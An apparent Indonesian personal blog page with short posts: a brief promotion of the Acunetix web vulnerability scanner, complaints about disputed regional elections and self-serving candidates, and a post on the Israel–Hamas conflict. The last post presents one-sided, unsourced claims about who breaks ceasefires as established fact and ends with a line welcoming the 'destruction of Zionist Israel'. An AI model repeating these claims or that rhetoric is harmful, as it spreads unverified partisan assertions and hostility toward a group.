Acunetix Web Vulnerability scanner 6


ini salah satu tool yang bisa digunakan untuk mendeteksi celah atau bug pada suatu website
banyak sekali fitur yang diwarakan dari XSS sacanner, sql injection, version chehk dan masih banyak lagi
dan juga ada beberapa tool seperti Blind SQL Injector, HTTP Snifer, HTTP Editor, Target Finder,dll

untuk download tool ini bisa di sini

Acunetix Web Vulnerability scanner 6

PILKADAohPILKADA

PILKADA kisruh, Gugatan PILKADA, Unjukrasa warga
berita-berita semacam itulah yang tiap hari mewarnai layar televisi kita
bisa kita hitung berapa jumlah PILKADA yang tak berujung dengan kata-kata diatas
kenapa mereka tidak legowo menerima semua hasil yang sudah ditetapkan oleh KPUD
yang paling parah adalah PILKADA JATIM
dimana sudah dilakukan putaran ke-3 yang tentunya tidak ada di Undang-Undang
saat sudah dilakukan dan di lakukkan rekapitulasi
ada satu pasangan calon yang masih tidak bisa menerima putusan KPUD
mereka berencana untuk menggugat lagi
ko masih punya muka, sudah kalah ko masih nekat saja
masak mau ada putaran ke-4 kan ya gak lucu
dana dari mana untuk melakukan PILKADA ulang
tidak sedikit dana yang dikeluarkan untuk itu
sepengetauan saya PILKADA yang berlangsung aman dan tertib
adalah PILKADA JABAR
tidak ada sengketa yang terjadi
adaikan semua daerah bisa seperti itu
tentunya tujuan utama untuk pesta demokrasi bisa terwujud
bukan malah pesta tawuran dan saling gugat

ModelDadakan

jalan-jalan sekarang penuh sesak oleh model-model dadakan
dengan pose yang beraneka ragam
dan pakaian yang macem-macem yang terkadang membuat ketawa
mereka seakan-akan yang paling baek
yang pantas untuk dijadikan wakil rakyat
mereka berteriak akulah yang pantas
pantas untuk apa?????
tidakkah kita melihat berapa wakil kita yang tersandung KORUPSI
yang terlibat KOLUSI, sudah banyak contohnya
apakah kita juga akan meregenerasi semua ini
melahirkan KORUPTOR KORUPTOR baru
yang merugikan keuangan negara
dan apakah saat merekan sudah duduk di kursi empuknya
mereka masih ingat sapa yang menjadikannya seperti sekarang
saya rasa tidak, karena mereka untuk menjadi itu semua butuh duit
duit untuk kampaye, duit untuk menjadi caleg
sebanding gak duit yan mereka keluarkan dengan gaji yang bakal mereka terima
tentunya tidak, trus untuk apa mereka membuang duit segitu banyak
apakah demi para rakyat yang dia wakili????
pertanyaan besar bagi kita
apa mungkin mereka tidak mencari ganti duit yang udah dikeluarakan untuk kampaye
yang tentunya dalam nominal yang tidak sedikit

"renungkan apa yang akan kamu pilih, dan lakukan jika kamu ragu"

Pembohongan Israel

Kemaren di televisi ada berita yang menyebutkan bahwa hammas melakukan erangan kepada tentara Israel
yang kemudian dikaitkan dengan pelanggaran gencatan senjata yang telah disepakati.
Dalam pemberitaan itu ditayangkan dimana sebuah mobil tentara israel diledakkan.
Dan seolah-olah HAmmas yang memulai serangan ke pada Isarel.
Padahal serangan tersebut merupakan serangan balasan yang dilancarkan Hammas.
Sebelumnya Israel telah melakukan penembakan terlebih dahulu kepada warga palestina.
dan tindakan tersebut yang memicu kemarahan Hammas.
selama ini Israel lah yang selalu melanggar genjatan senjata dan memulai pertempuran.
tidak dapat dipungkiri lagi hal tersebut.
dan Israel melalui media seakan-akan memberitakan bahwa Hammas yang memulai serangan terlebih dahulu.


"Kekuatan Allah akan datang pada saat kehancuran Zionis Israel"